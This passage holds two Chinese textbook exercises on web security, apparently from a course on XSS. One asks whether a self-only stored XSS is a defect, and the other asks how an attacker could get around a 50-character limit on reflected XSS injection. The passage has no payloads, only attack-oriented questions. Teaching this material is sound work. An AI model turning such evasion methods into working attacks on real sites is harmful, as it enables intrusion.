
13-13 假设 仅 在 返回 给 自己 的 数据 中 发 现 了 持久 型 XSS 漏洞 ,这 种 漏洞 是 否 存在 
安全 缺陷 ? 

13-14 已 知 一 个 反射 型 XSS 漏洞 ,可 以 在 返回 页 面 的 HTML 代码 的 某 个 位 置 注入 
任意 代码 ,但 是 注入 代码 的 长 度 被 限制 为 50 个 字符 。 如 果 攻 击 者 希望 注入 一 个 超 长 脚 
本 ,而 且 无 法 调用 外 部 服务 器 上 的 脚本 ,如何 解决 长 度 限制 ? 
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